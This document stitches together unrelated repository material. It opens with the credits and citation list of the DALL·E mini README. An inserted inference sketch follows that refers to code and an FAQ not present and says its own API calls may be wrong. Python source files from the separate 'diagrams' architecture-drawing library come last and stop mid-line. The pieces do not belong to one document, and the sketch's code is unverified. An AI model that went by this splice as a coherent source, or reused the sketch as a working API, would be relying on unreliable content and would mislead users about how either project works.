[Pedro Cuenca](https://github.com/pcuenca) * [Khalid Saifullah](https://github.com/khalidsaifullaah) * [Tanishq Abraham](https://github.com/tmabraham) * [Phúc Lê Khắc](https://github.com/lkhphuc) * [Luke Melas](https://github.com/lukemelas) * [Ritobrata Ghosh](https://github.com/ghosh-r) Many thanks to the people who helped make it better: * the [DALLE-Pytorch](https://discord.gg/xBPBXfcFHd) and [EleutherAI](https://www.eleuther.ai/) communities for testing and exchanging cool ideas * [Rohan Anil](https://github.com/rohan-anil) for adding Distributed Shampoo optimizer and always giving great suggestions * [Phil Wang](https://github.com/lucidrains) has provided a lot of cool implementations of transformer variants and gives interesting insights with [x-transformers](https://github.com/lucidrains/x-transformers) * [Katherine Crowson](https://github.com/crowsonkb) for [super conditioning](https://twitter.com/RiversHaveWings/status/1478093658716966912) * the [Gradio team](https://gradio.app/) made an amazing UI for our app ## Citing DALL·E mini If you find DALL·E mini useful in your research or wish to refer, please use the following BibTeX entry. ```text @misc{Dayma_DALL·E_Mini_2021, author = {Dayma, Boris and Patil, Suraj and Cuenca, Pedro and Saifullah, Khalid and Abraham, Tanishq and Lê Khắc, Phúc and Melas, Luke and Ghosh, Ritobrata}, doi = {10.5281/zenodo.5146400}, month = {7}, title = {DALL·E Mini}, url = {https://github.com/borisdayma/dalle-mini}, year = {2021} } ``` ## References Original DALL·E from "[Zero-Shot Text-to-Image Generation](https://arxiv.org/abs/2102.12092)" with image quantization from "[Learning Transferable Visual Models From Natural Language Supervision](https://arxiv.org/abs/2103.00020)". Image encoder from "[Taming Transformers for High-Resolution Image Synthesis](https://arxiv.org/abs/2012.09841v2)". 
Sequence to sequence model based on "[BART: Denoising Sequence-to-Sequence Pre-training for Natural Language Generation, Translation, and Comprehension](https://arxiv.org/abs/1910.13461v1)" with implementation of a few variants: * "[GLU Variants Improve Transformer](https://arxiv.org/abs/2002.05202)" * "[Deepnet: Scaling Transformers to 1,000 Layers](https://arxiv.org/abs/2203.00555)" * "[NormFormer: Improved Transformer Pretraining with Extra Normalization](https://arxiv.org/abs/2110.09456)" * "[Swin Transformer: Hierarchical Vision Transformer using Shifted Windows](https://arxiv.org/abs/2103.14030)" * "[CogView: Mastering Text-to-Image Generation via Transformers](https://arxiv.org/abs/2105.13290v2)" * "[Root Mean Square Layer Normalization](https://arxiv.org/abs/1910.07467)" * "[Sinkformers: Transformers with Doubly Stochastic Attention](https://arxiv.org/abs/2110.11773)" * "[Foundation Transformers](https://arxiv.org/abs/2210.06423) Main optimizer (Distributed Shampoo) from "[Scalable Second Order Optimization for Deep Learning](https://arxiv.org/abs/2002.09018)". ### Citations ```text @misc{ title={Zero-Shot Text-to-Image Generation}, author={Aditya Ramesh and Mikhail Pavlov and Gabriel Goh and Scott Gray and Chelsea Voss and Alec Radford and Mark Chen and Ilya Sutskever}, year={2021}, eprint={2102.12092}, archivePrefix={arXiv}, primaryClass={cs.CV} } ``` ```text @misc{ title={Learning Transferable Visual Models From Natural Language Supervision}, author={Alec Radford and Jong Wook Kim and Chris Hallacy and Aditya Ramesh and Gabriel Goh and Sandhini Agarwal and Girish Sastry and Amanda Askell and Pamela Mishkin and Jack Clark and Gretchen Krueger and Ilya Sutskever}, year={2021}, eprint={2103.00020}, archivePrefix={arXiv}, primaryClass={cs.CV} } ``` ```text @misc{ title={Taming Transformers for High-Resolution Image Synthesis}, author={Patrick Esser and Robin Rombach and Björn Ommer}, year={2021}, eprint={2012.09841}, archivePrefix={arXiv}, primaryClass={cs.CV} } ``` ```text @misc{ title={BART: Denoising Sequence-to-Sequence Pre-training for Natural Language Generation, Translation, and Comprehension}, author={Mike Lewis and Yinhan Liu and Naman Goyal and Marjan Ghazvininejad and Abdelrahman Mohamed and Omer Levy and Ves Stoyanov and Luke Zettlemoyer}, year={2019}, eprint={1910.13461}, archivePrefix={arXiv}, primaryClass={cs.CL} } ``` ```text @misc{ title={Scalable Second Order Optimization for Deep Learning}, author={Rohan Anil and Vineet Gupta and Tomer Koren and Kevin Regan and Yoram Singer}, year={2021}, eprint={2002.09018}, archivePrefix={arXiv}, primaryClass={cs.LG} } ``` ```text @misc{ title={GLU Variants Improve Transformer}, author={Noam Shazeer}, year={2020}, url={https://arxiv.org/abs/2002.05202} } ``` ```text @misc{ title={DeepNet: Scaling transformers to 1,000 layers}, author={Wang, Hongyu and Ma, Shuming and Dong, Li and Huang, Shaohan and Zhang, Dongdong and Wei, Furu}, year={2022}, eprint={2203.00555} archivePrefix={arXiv}, primaryClass={cs.LG} } ``` ```text @misc{ title={NormFormer: Improved Transformer Pretraining with Extra Normalization}, author={Sam Shleifer and Jason Weston and Myle Ott}, year={2021}, eprint={2110.09456}, archivePrefix={arXiv}, primaryClass={cs.CL} } ``` ```text @inproceedings{ title={Swin Transformer V2: Scaling Up Capacity and Resolution}, author={Ze Liu and Han Hu and Yutong Lin and Zhuliang Yao and Zhenda Xie and Yixuan Wei and Jia Ning and Yue Cao and Zheng Zhang and Li Dong and Furu Wei and Baining Guo}, booktitle={International Conference 
on Computer Vision and Pattern Recognition (CVPR)}, year={2022} } ``` ```text @misc{ title = {CogView: Mastering Text-to-Image Generation via Transformers}, author = {Ming Ding and Zhuoyi Yang and Wenyi Hong and Wendi Zheng and Chang Zhou and Da Yin and Junyang Lin and Xu Zou and Zhou Shao and Hongxia Yang and Jie Tang}, year = {2021}, eprint = {2105.13290}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```text @misc{ title = {Root Mean Square Layer Normalization}, author = {Biao Zhang and Rico Sennrich}, year = {2019}, eprint = {1910.07467}, archivePrefix = {arXiv}, primaryClass = {cs.LG} } ``` ```text @misc{ title = {Sinkformers: Transformers with Doubly Stochastic Attention}, url = {https://arxiv.org/abs/2110.11773}, author = {Sander, Michael E. and Ablin, Pierre and Blondel, Mathieu and Peyré, Gabriel}, publisher = {arXiv}, year = {2021}, } ``` ```text @misc{ title = {Smooth activations and reproducibility in deep networks}, url = {https://arxiv.org/abs/2010.09931}, author = {Shamir, Gil I. and Lin, Dong and Coviello, Lorenzo}, publisher = {arXiv}, year = {2020}, } ``` ```text @misc{ title = {Foundation Transformers}, url = {https://arxiv.org/abs/2210.06423}, author = {Wang, Hongyu and Ma, Shuming and Huang, Shaohan and Dong, Li and Wang, Wenhui and Peng, Zhiliang and Wu, Yu and Bajaj, Payal and Singhal, Saksham and Benhaim, Alon and Patra, Barun and Liu, Zhun and Chaudhary, Vishrav and Song, Xia and Wei, Furu}, publisher = {arXiv}, year = {2022}, } ```
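For readers who prefer code over the hosted notebook, here is a rough sketch of how the generation path above is typically driven for inference. The `DalleBart`/`DalleBartProcessor` imports, the model id, and the keyword arguments are assumptions based on the inference pipeline notebook and the Model Hub links in the FAQ; they may differ between releases, so treat this as a sketch rather than the project's canonical API. Generated sequences are image token codes and still need to be decoded with the VQGAN-f16-16384 checkpoint listed above.

```py
# Sketch only: imports, model id and keyword names are assumptions taken from
# tools/inference/inference_pipeline.ipynb and may change between releases.
import jax
import jax.numpy as jnp
from dalle_mini import DalleBart, DalleBartProcessor  # assumed public exports

# With _do_init=False the Flax loader is expected to return (model, params).
model, params = DalleBart.from_pretrained(
    "dalle-mini/dalle-mini", dtype=jnp.float16, _do_init=False
)
processor = DalleBartProcessor.from_pretrained("dalle-mini/dalle-mini")

tokenized = processor(["an armchair in the shape of an avocado"])
key = jax.random.PRNGKey(0)

# condition_scale > 1 takes the super-conditioning branch shown in _sample();
# sampling knobs (do_sample, top_k, top_p, temperature) follow the generate dispatch above.
encoded_images = model.generate(
    **tokenized,
    prng_key=key,
    params=params,
    do_sample=True,
    top_k=50,
    condition_scale=10.0,
)
# encoded_images.sequences holds VQGAN codes; decode them with the
# VQGAN-f16-16384 model to obtain actual pixels.
```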
diagrams
4c2d8a3795d2a15a168224b2a5919c2950df679b
File: config.py # fmt: off ######################### # Application # ######################### APP_NAME = "diagrams" DIR_DOC_ROOT = "docs/nodes" DIR_APP_ROOT = "diagrams" DIR_RESOURCE = "resources" DIR_TEMPLATE = "templates" PROVIDERS = ( "base", "onprem", "aws", "azure", "digitalocean", "gcp", "ibm", "firebase", "k8s", "alibabacloud", "oci", "programming", "saas", "elastic", "generic", "openstack", "outscale", ) ######################### # Resource Processing # ######################### CMD_ROUND = "round" CMD_ROUND_OPTS = ("-w",) CMD_SVG2PNG = "inkscape" CMD_SVG2PNG_OPTS = ("-w", "256", "-h", "256", "--export-type", "png") CMD_SVG2PNG_IM = "convert" CMD_SVG2PNG_IM_OPTS = ("-shave", "25%x25%", "-resize", "256x256!") FILE_PREFIXES = { "onprem": (), "aws": ("Amazon-", "AWS-"), "azure": ("Azure-",), "digitalocean": (), "gcp": ("Cloud-",), "firebase": ("Cloud-",), "ibm": (), "k8s": (), "alibabacloud": (), "oci": ("OCI-icon-",), "programming": (), "saas": (), "elastic": (), "outscale": (), "generic": (), "openstack": (), } ######################### # Doc Auto Generation # ######################### TMPL_APIDOC = "apidoc.tmpl" ######################### # Class Auto Generation # ######################### TMPL_MODULE = "module.tmpl" UPPER_WORDS = { "aws": ("aws", "api", "ebs", "ec2", "efs", "emr", "rds", "ml", "mq", "nat", "vpc", "waf", "sdk"), "azure": ("ad", "b2c", "ai", "api", "cdn", "ddos", "dns", "fxt", "hana", "hd", "id", "sap", "sql", "vm", "vpn", "vpc"), "gcp": ("gcp", "ai", "api", "cdn", "dns", "gke", "gpu", "iap", "ml", "nat", "os", "sdk", "sql", "tpu", "vpn"), "firebase": ("ab", "fcm", "ml"), "k8s": ( "api", "cm", "ccm", "crb", "crd", "ds", "etcd", "hpa", "k8s", "ns", "psp", "pv", "pvc", "rb", "rs", "sa", "sc", "sts", "svc", ), "oci": ("oci", "ocid", "oke", "ocir", "ddos", "waf", "bm", "vm", "cdn", "vpn", "dns", "nat", "dms", "api", "id"), "elastic": ("apm", "siem", "ece", "eck", "sql"), "generic": ("vpn", "ios", "xen", "sql", "lxc"), "outscale": ("osc",), "openstack": ("rpm", "loci", "nfv", "ec2api"), "pve": ("pve"), "ibm": ("ibm"), } TITLE_WORDS = { "onprem": { "onprem": "OnPrem", }, "alibabacloud": { "alibabacloud": "AlibabaCloud" }, "aws": { "cloudfront": "CloudFront" }, "digitalocean": { "digitalocean": "DigitalOcean" }, "openstack": { "openstack": "OpenStack" }, "ibm": { "ibm": "IBMCloud" }, } # TODO: check if the classname exists ALIASES = { "onprem": { "analytics": { "Powerbi": "PowerBI" }, "ci": { "Circleci": "CircleCI", "Concourseci": "ConcourseCI", "Droneci": "DroneCI", "Gitlabci": "GitlabCI", "Travisci": "TravisCI", "Teamcity": "TC", "Zuulci": "ZuulCI", }, "container": { "Lxc": "LXC", "Rkt": "RKT", }, "database": { "Clickhouse": "ClickHouse", "Cockroachdb": "CockroachDB", "Couchdb": "CouchDB", "Hbase": "HBase", "Influxdb": "InfluxDB", "Janusgraph": "JanusGraph", "Mariadb": "MariaDB", "Mongodb": "MongoDB", "Mssql": "MSSQL", "Mysql": "MySQL", "Postgresql": "PostgreSQL", }, "gitops": { "Argocd": "ArgoCD", }, "logging": { "Fluentbit": "FluentBit", "Rsyslog": "RSyslog", }, "network": { "Etcd": "ETCD", "Haproxy": "HAProxy", "OpenServiceMesh": "OSM", "Opnsense": "OPNSense", "Pfsense": "PFSense", "Vyos": "VyOS" }, "proxmox": { "Pve": "ProxmoxVE", }, "queue": { "Activemq": "ActiveMQ", "Emqx": "EMQX", "Rabbitmq": "RabbitMQ", "Zeromq": "ZeroMQ", }, "storage": { "Ceph": "CEPH", "CephOsd": "CEPH_OSD", }, "workflow": { "Kubeflow": "KubeFlow", "Nifi": "NiFi", } }, "aws": { "analytics": { "ElasticsearchService": "ES", }, "business": { "AlexaForBusiness": "A4B" }, "blockchain": { 
"QuantumLedgerDatabaseQldb": "QLDB" }, "compute": { "ApplicationAutoScaling": "AutoScaling", "EC2Ami": "AMI", "EC2ContainerRegistry": "ECR", "ElasticBeanstalk": "EB", "ElasticContainerService": "ECS", "ElasticKubernetesService": "EKS", "ServerlessApplicationRepository": "SAR", }, "database": { "DatabaseMigrationService": "DMS", "DocumentdbMongodbCompatibility": "DocumentDB", "DynamodbDax": "DAX", "DynamodbGlobalSecondaryIndex": "DynamodbGSI", "Database": "DB", "Dynamodb": "DDB", "Elasticache": "ElastiCache", "QuantumLedgerDatabaseQldb": "QLDB", }, "devtools": { "CommandLineInterface": "CLI", "DeveloperTools": "DevTools", }, "engagement": { "SimpleEmailServiceSes": "SES", }, "general": { "GenericOfficeBuilding": "OfficeBuilding", }, "integration": { "SimpleNotificationServiceSns": "SNS", "SimpleQueueServiceSqs": "SQS", "StepFunctions": "SF", }, "iot": { "Freertos": "FreeRTOS", "IotHardwareBoard": "IotBoard", }, "management": { "SystemsManager": "SSM", "SystemsManagerParameterStore": "ParameterStore", }, "migration": { "ApplicationDiscoveryService": "ADS", "CloudendureMigration": "CEM", "DatabaseMigrationService": "DMS", "MigrationAndTransfer": "MAT", "ServerMigrationService": "SMS", }, "ml": { "DeepLearningContainers": "DLC", }, "network": { "CloudFront": "CF", "ElasticLoadBalancing": "ELB", "ElbApplicationLoadBalancer": "ALB", "ElbClassicLoadBalancer": "CLB", "ElbNetworkLoadBalancer": "NLB", "GlobalAccelerator": "GAX", }, "security": { "CertificateManager": "ACM", "Cloudhsm": "CloudHSM", "DirectoryService": "DS", "FirewallManager": "FMS", "IdentityAndAccessManagementIamAccessAnalyzer": "IAMAccessAnalyzer", "IdentityAndAccessManagementIamAWSSts": "IAMAWSSts", "IdentityAndAccessManagementIamPermissions": "IAMPermissions", "IdentityAndAccessManagementIamRole": "IAMRole", "IdentityAndAccessManagementIam": "IAM", "KeyManagementService": "KMS", "ResourceAccessManager": "RAM", }, "storage": { "CloudendureDisasterRecovery": "CDR", "ElasticBlockStoreEBS": "EBS", "ElasticFileSystemEFS": "EFS", "Fsx": "FSx", "SimpleStorageServiceS3": "S3", }, }, "azure": { "compute": { "ContainerRegistries": "ACR", "KubernetesServices": "AKS", "VMScaleSet": "VMSS" }, }, "gcp": { "analytics": { "Bigquery": "BigQuery", "Pubsub": "PubSub", }, "compute": { "AppEngine": "GAE", "Functions": "GCF", "ComputeEngine": "GCE", "KubernetesEngine": "GKE", }, "database": { "Bigtable": "BigTable", }, "devtools": { "ContainerRegistry": "GCR", }, "ml": { "Automl": "AutoML", "NaturalLanguageAPI": "NLAPI", "SpeechToText": "STT", "TextToSpeech": "TTS", }, "network": { "VirtualPrivateCloud": "VPC" }, "security": { "KeyManagementService": "KMS", "SecurityCommandCenter": "SCC", }, "storage": { "Storage": "GCS", }, }, "firebase": { "grow": { "Messaging": "FCM" } }, "k8s": { "clusterconfig": { "Limits": "LimitRange", "HPA": "HorizontalPodAutoscaler", }, "compute": { "Deploy": "Deployment", "DS": "DaemonSet", "RS": "ReplicaSet", "STS": "StatefulSet" }, "controlplane": { "API": "APIServer", "CM": "ControllerManager", "KProxy": "KubeProxy", "Sched": "Scheduler", }, "group": { "NS": "Namespace", }, "network": { "Ep": "Endpoint", "Ing": "Ingress", "Netpol": "NetworkPolicy", "SVC": "Service", }, "podconfig": { "CM": "ConfigMap", }, "rbac": { "CRole": "ClusterRole", "CRB": "ClusterRoleBinding", "RB": "RoleBinding", "SA": "ServiceAccount", }, "storage": { "PV": "PersistentVolume", "PVC": "PersistentVolumeClaim", "SC": "StorageClass", "Vol": "Volume", }, }, "alibabacloud": { "application": { "LogService": "SLS", "MessageNotificationService": "MNS", 
"PerformanceTestingService": "PTS", "SmartConversationAnalysis": "SCA", }, "compute": { "AutoScaling": "ESS", "ElasticComputeService": "ECS", "ElasticContainerInstance": "ECI", "ElasticHighPerformanceComputing": "EHPC", "FunctionCompute": "FC", "OperationOrchestrationService": "OOS", "ResourceOrchestrationService": "ROS", "ServerLoadBalancer": "SLB", "ServerlessAppEngine": "SAE", "SimpleApplicationServer": "SAS", "WebAppService": "WAS", }, "database": { "DataManagementService": "DMS", "DataTransmissionService": "DTS", "DatabaseBackupService": "DBS", "DisributeRelationalDatabaseService": "DRDS", "GraphDatabaseService": "GDS", "RelationalDatabaseService": "RDS", }, "network": { "CloudEnterpriseNetwork": "CEN", "ElasticIpAddress": "EIP", "ServerLoadBalancer": "SLB", "VirtualPrivateCloud": "VPC", }, "security": { "AntiBotService": "ABS", "AntifraudService": "AS", "CloudFirewall": "CFW", "ContentModeration": "CM", "DataEncryptionService": "DES", "WebApplicationFirewall": "WAF", }, "storage": { "FileStorageHdfs": "HDFS", "FileStorageNas": "NAS", "HybridBackupRecovery": "HBR", "HybridCloudDisasterRecovery": "HDR", "ObjectStorageService": "OSS", "ObjectTableStore": "OTS", } }, "digitalocean": {}, "oci": { "compute": { "VM": "VirtualMachine", "VMWhite": "VirtualMachineWhite", "BM": "BareMetal", "BMWhite": "BareMetalWhite", "OCIR": "OCIRegistry", "OCIRWhite": "OCIRegistryWhite", "OKE": "ContainerEngine", "OKEWhite": "ContainerEngineWhite", }, "database": { "Autonomous": "ADB", "AutonomousWhite": "ADBWhite", "DatabaseService": "DBService", "DatabaseServiceWhite": "DBServiceWhite", } }, "programming": { "framework": { "Fastapi": "FastAPI", "Graphql": "GraphQL" }, "language": { "Javascript": "JavaScript", "Nodejs": "NodeJS", "Php": "PHP", "Typescript": "TypeScript" }, }, "saas": { "logging": { "Datadog": "DataDog", "Newrelic": "NewRelic" } }, "elastic": { "elasticsearch": { "Elasticsearch": "ElasticSearch", "Logstash": "LogStash", "MachineLearning": "ML", } }, "outscale": { "Osc": "OSC", }, "ibm": {}, "generic": {}, "openstack": { "user": { "Openstackclient": "OpenStackClient", }, "billing": { "Cloudkitty": "CloudKitty", }, "deployment": { "Kolla": "KollaAnsible", "Tripleo": "TripleO", } }, } File: diagrams/__init__.py import contextvars import os import uuid from pathlib import Path from typing import Dict, List, Optional, Union from graphviz import Digraph # Global contexts for a diagrams and a cluster. # # These global contexts are for letting the clusters and nodes know # where context they are belong to. So the all clusters and nodes does # not need to specify the current diagrams or cluster via parameters. 
__diagram = contextvars.ContextVar("diagrams") __cluster = contextvars.ContextVar("cluster") def getdiagram() -> "Diagram": try: return __diagram.get() except LookupError: return None def setdiagram(diagram: "Diagram"): __diagram.set(diagram) def getcluster() -> "Cluster": try: return __cluster.get() except LookupError: return None def setcluster(cluster: "Cluster"): __cluster.set(cluster) class Diagram: __directions = ("TB", "BT", "LR", "RL") __curvestyles = ("ortho", "curved") __outformats = ("png", "jpg", "svg", "pdf", "dot") # fmt: off _default_graph_attrs = { "pad": "2.0", "splines": "ortho", "nodesep": "0.60", "ranksep": "0.75", "fontname": "Sans-Serif", "fontsize": "15", "fontcolor": "#2D3436", } _default_node_attrs = { "shape": "box", "style": "rounded", "fixedsize": "true", "width": "1.4", "height": "1.4", "labelloc": "b", # imagepos attribute is not backward compatible # TODO: check graphviz version to see if "imagepos" is available >= 2.40 # https://github.com/xflr6/graphviz/blob/master/graphviz/backend.py#L248 # "imagepos": "tc", "imagescale": "true", "fontname": "Sans-Serif", "fontsize": "13", "fontcolor": "#2D3436", } _default_edge_attrs = { "color": "#7B8894", } # fmt: on # TODO: Label position option # TODO: Save directory option (filename + directory?) def __init__( self, name: str = "", filename: str = "", direction: str = "LR", curvestyle: str = "ortho", outformat: str = "png", autolabel: bool = False, show: bool = True, strict: bool = False, graph_attr: Optional[dict] = None, node_attr: Optional[dict] = None, edge_attr: Optional[dict] = None, ): """Diagram represents a global diagrams context. :param name: Diagram name. It will be used for output filename if the filename isn't given. :param filename: The output filename, without the extension (.png). If not given, it will be generated from the name. :param direction: Data flow direction. Default is 'left to right'. :param curvestyle: Curve bending style. One of "ortho" or "curved". :param outformat: Output file format. Default is 'png'. :param show: Open generated image after save if true, just only save otherwise. :param graph_attr: Provide graph_attr dot config attributes. :param node_attr: Provide node_attr dot config attributes. :param edge_attr: Provide edge_attr dot config attributes. :param strict: Rendering should merge multi-edges. """ if graph_attr is None: graph_attr = {} if node_attr is None: node_attr = {} if edge_attr is None: edge_attr = {} self.name = name if not name and not filename: filename = "diagrams_image" elif not filename: filename = "_".join(self.name.split()).lower() self.filename = filename self.dot = Digraph(self.name, filename=self.filename, strict=strict) # Set attributes. 
for k, v in self._default_graph_attrs.items(): self.dot.graph_attr[k] = v self.dot.graph_attr["label"] = self.name for k, v in self._default_node_attrs.items(): self.dot.node_attr[k] = v for k, v in self._default_edge_attrs.items(): self.dot.edge_attr[k] = v if not self._validate_direction(direction): raise ValueError(f'"{direction}" is not a valid direction') self.dot.graph_attr["rankdir"] = direction if not self._validate_curvestyle(curvestyle): raise ValueError(f'"{curvestyle}" is not a valid curvestyle') self.dot.graph_attr["splines"] = curvestyle if isinstance(outformat, list): for one_format in outformat: if not self._validate_outformat(one_format): raise ValueError(f'"{one_format}" is not a valid output format') else: if not self._validate_outformat(outformat): raise ValueError(f'"{outformat}" is not a valid output format') self.outformat = outformat # Merge passed in attributes self.dot.graph_attr.update(graph_attr) self.dot.node_attr.update(node_attr) self.dot.edge_attr.update(edge_attr) self.show = show self.autolabel = autolabel def __str__(self) -> str: return str(self.dot) def __enter__(self): setdiagram(self) return self def __exit__(self, exc_type, exc_value, traceback): self.render() # Remove the graphviz file leaving only the image. os.remove(self.filename) setdiagram(None) def _repr_png_(self): return self.dot.pipe(format="png") def _validate_direction(self, direction: str) -> bool: return direction.upper() in self.__directions def _validate_curvestyle(self, curvestyle: str) -> bool: return curvestyle.lower() in self.__curvestyles def _validate_outformat(self, outformat: str) -> bool: return outformat.lower() in self.__outformats def node(self, nodeid: str, label: str, **attrs) -> None: """Create a new node.""" self.dot.node(nodeid, label=label, **attrs) def connect(self, node: "Node", node2: "Node", edge: "Edge") -> None: """Connect the two Nodes.""" self.dot.edge(node.nodeid, node2.nodeid, **edge.attrs) def subgraph(self, dot: Digraph) -> None: """Create a subgraph for clustering""" self.dot.subgraph(dot) def render(self) -> None: if isinstance(self.outformat, list): for one_format in self.outformat: self.dot.render(format=one_format, view=self.show, quiet=True) else: self.dot.render(format=self.outformat, view=self.show, quiet=True) class Cluster: __directions = ("TB", "BT", "LR", "RL") __bgcolors = ("#E5F5FD", "#EBF3E7", "#ECE8F6", "#FDF7E3") # fmt: off _default_graph_attrs = { "shape": "box", "style": "rounded", "labeljust": "l", "pencolor": "#AEB6BE", "fontname": "Sans-Serif", "fontsize": "12", } # fmt: on # FIXME: # Cluster direction does not work now. Graphviz couldn't render # correctly for a subgraph that has a different rank direction. def __init__( self, label: str = "cluster", direction: str = "LR", graph_attr: Optional[dict] = None, ): """Cluster represents a cluster context. :param label: Cluster label. :param direction: Data flow direction. Default is 'left to right'. :param graph_attr: Provide graph_attr dot config attributes. """ if graph_attr is None: graph_attr = {} self.label = label self.name = "cluster_" + self.label self.dot = Digraph(self.name) # Set attributes. for k, v in self._default_graph_attrs.items(): self.dot.graph_attr[k] = v self.dot.graph_attr["label"] = self.label if not self._validate_direction(direction): raise ValueError(f'"{direction}" is not a valid direction') self.dot.graph_attr["rankdir"] = direction # Node must be belong to a diagrams. 
self._diagram = getdiagram() if self._diagram is None: raise EnvironmentError("Global diagrams context not set up") self._parent = getcluster() # Set cluster depth for distinguishing the background color self.depth = self._parent.depth + 1 if self._parent else 0 coloridx = self.depth % len(self.__bgcolors) self.dot.graph_attr["bgcolor"] = self.__bgcolors[coloridx] # Merge passed in attributes self.dot.graph_attr.update(graph_attr) def __enter__(self): setcluster(self) return self def __exit__(self, exc_type, exc_value, traceback): if self._parent: self._parent.subgraph(self.dot) else: self._diagram.subgraph(self.dot) setcluster(self._parent) def _validate_direction(self, direction: str) -> bool: return direction.upper() in self.__directions def node(self, nodeid: str, label: str, **attrs) -> None: """Create a new node in the cluster.""" self.dot.node(nodeid, label=label, **attrs) def subgraph(self, dot: Digraph) -> None: self.dot.subgraph(dot) class Node: """Node represents a node for a specific backend service.""" _provider = None _type = None _icon_dir = None _icon = None _height = 1.9 def __init__(self, label: str = "", *, nodeid: str = None, **attrs: Dict): """Node represents a system component. :param label: Node label. """ # Generates an ID for identifying a node, unless specified self._id = nodeid or self._rand_id() self.label = label # Node must be belong to a diagrams. self._diagram = getdiagram() if self._diagram is None: raise EnvironmentError("Global diagrams context not set up") if self._diagram.autolabel: prefix = self.__class__.__name__ if self.label: self.label = prefix + "\n" + self.label else: self.label = prefix # fmt: off # If a node has an icon, increase the height slightly to avoid # that label being spanned between icon image and white space. # Increase the height by the number of new lines included in the label. padding = 0.4 * (self.label.count('\n')) self._attrs = { "shape": "none", "height": str(self._height + padding), "image": self._load_icon(), } if self._icon else {} # fmt: on self._attrs.update(attrs) self._cluster = getcluster() # If a node is in the cluster context, add it to cluster. 
if self._cluster: self._cluster.node(self._id, self.label, **self._attrs) else: self._diagram.node(self._id, self.label, **self._attrs) def __repr__(self): _name = self.__class__.__name__ return f"<{self._provider}.{self._type}.{_name}>" def __sub__(self, other: Union["Node", List["Node"], "Edge"]): """Implement Self - Node, Self - [Nodes] and Self - Edge.""" if isinstance(other, list): for node in other: self.connect(node, Edge(self)) return other elif isinstance(other, Node): return self.connect(other, Edge(self)) else: other.node = self return other def __rsub__(self, other: Union[List["Node"], List["Edge"]]): """Called for [Nodes] and [Edges] - Self because list don't have __sub__ operators.""" for o in other: if isinstance(o, Edge): o.connect(self) else: o.connect(self, Edge(self)) return self def __rshift__(self, other: Union["Node", List["Node"], "Edge"]): """Implements Self >> Node, Self >> [Nodes] and Self Edge.""" if isinstance(other, list): for node in other: self.connect(node, Edge(self, forward=True)) return other elif isinstance(other, Node): return self.connect(other, Edge(self, forward=True)) else: other.forward = True other.node = self return other def __lshift__(self, other: Union["Node", List["Node"], "Edge"]): """Implements Self << Node, Self << [Nodes] and Self << Edge.""" if isinstance(other, list): for node in other: self.connect(node, Edge(self, reverse=True)) return other elif isinstance(other, Node): return self.connect(other, Edge(self, reverse=True)) else: other.reverse = True return other.connect(self) def __rrshift__(self, other: Union[List["Node"], List["Edge"]]): """Called for [Nodes] and [Edges] >> Self because list don't have __rshift__ operators.""" for o in other: if isinstance(o, Edge): o.forward = True o.connect(self) else: o.connect(self, Edge(self, forward=True)) return self def __rlshift__(self, other: Union[List["Node"], List["Edge"]]): """Called for [Nodes] << Self because list of Nodes don't have __lshift__ operators.""" for o in other: if isinstance(o, Edge): o.reverse = True o.connect(self) else: o.connect(self, Edge(self, reverse=True)) return self @property def nodeid(self): return self._id # TODO: option for adding flow description to the connection edge def connect(self, node: "Node", edge: "Edge"): """Connect to other node. :param node: Other node instance. :param edge: Type of the edge. :return: Connected node. """ if not isinstance(node, Node): ValueError(f"{node} is not a valid Node") if not isinstance(edge, Edge): ValueError(f"{edge} is not a valid Edge") # An edge must be added on the global diagrams, not a cluster. self._diagram.connect(self, node, edge) return node @staticmethod def _rand_id(): return uuid.uuid4().hex def _load_icon(self): basedir = Path(os.path.abspath(os.path.dirname(__file__))) return os.path.join(basedir.parent, self._icon_dir, self._icon) class Edge: """Edge represents an edge between two nodes.""" _default_edge_attrs = { "fontcolor": "#2D3436", "fontname": "Sans-Serif", "fontsize": "13", } def __init__( self, node: "Node" = None, forward: bool = False, reverse: bool = False, label: str = "", color: str = "", style: str = "", **attrs: Dict, ): """Edge represents an edge between two nodes. :param node: Parent node. :param forward: Points forward. :param reverse: Points backward. :param label: Edge label. :param color: Edge color. :param style: Edge style. 
:param attrs: Other edge attributes """ if node is not None: assert isinstance(node, Node) self.node = node self.forward = forward self.reverse = reverse self._attrs = {} # Set attributes. for k, v in self._default_edge_attrs.items(): self._attrs[k] = v if label: # Graphviz complaining about using label for edges, so replace it with xlabel. # Update: xlabel option causes the misaligned label position: https://github.com/mingrammer/diagrams/issues/83 self._attrs["label"] = label if color: self._attrs["color"] = color if style: self._attrs["style"] = style self._attrs.update(attrs) def __sub__(self, other: Union["Node", "Edge", List["Node"]]): """Implement Self - Node or Edge and Self - [Nodes]""" return self.connect(other) def __rsub__(self, other: Union[List["Node"], List["Edge"]]) -> List["Edge"]: """Called for [Nodes] or [Edges] - Self because list don't have __sub__ operators.""" return self.append(other) def __rshift__(self, other: Union["Node", "Edge", List["Node"]]): """Implements Self >> Node or Edge and Self >> [Nodes].""" self.forward = True return self.connect(other) def __lshift__(self, other: Union["Node", "Edge", List["Node"]]): """Implements Self << Node or Edge and Self << [Nodes].""" self.reverse = True return self.connect(other) def __rrshift__(self, other: Union[List["Node"], List["Edge"]]) -> List["Edge"]: """Called for [Nodes] or [Edges] >> Self because list of Edges don't have __rshift__ operators.""" return self.append(other, forward=True) def __rlshift__(self, other: Union[List["Node"], List["Edge"]]) -> List["Edge"]: """Called for [Nodes] or [Edges] << Self because list of Edges don't have __lshift__ operators.""" return self.append(other, reverse=True) def append(self, other: Union[List["Node"], List["Edge"]], forward=None, reverse=None) -> List["Edge"]: result = [] for o in other: if isinstance(o, Edge): o.forward = forward if forward else o.forward o.reverse = forward if forward else o.reverse self._attrs = o.attrs.copy() result.append(o) else: result.append(Edge(o, forward=forward, reverse=reverse, **self._attrs)) return result def connect(self, other: Union["Node", "Edge", List["Node"]]): if isinstance(other, list): for node in other: self.node.connect(node, self) return other elif isinstance(other, Edge): self._attrs = other._attrs.copy() return self else: if self.node is not None: return self.node.connect(other, self) else: self.node = other return self @property def attrs(self) -> Dict: if self.forward and self.reverse: direction = "both" elif self.forward: direction = "forward" elif self.reverse: direction = "back" else: direction = "none" return {**self._attrs, "dir": direction} Group = Cluster File: diagrams/openstack/containerservices.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Containerservices(_OpenStack): _type = "containerservices" _icon_dir = "resources/openstack/containerservices" class Kuryr(_Containerservices): _icon = "kuryr.png" # Aliases File: diagrams/openstack/user.py # This module is automatically generated by autogen.sh. DO 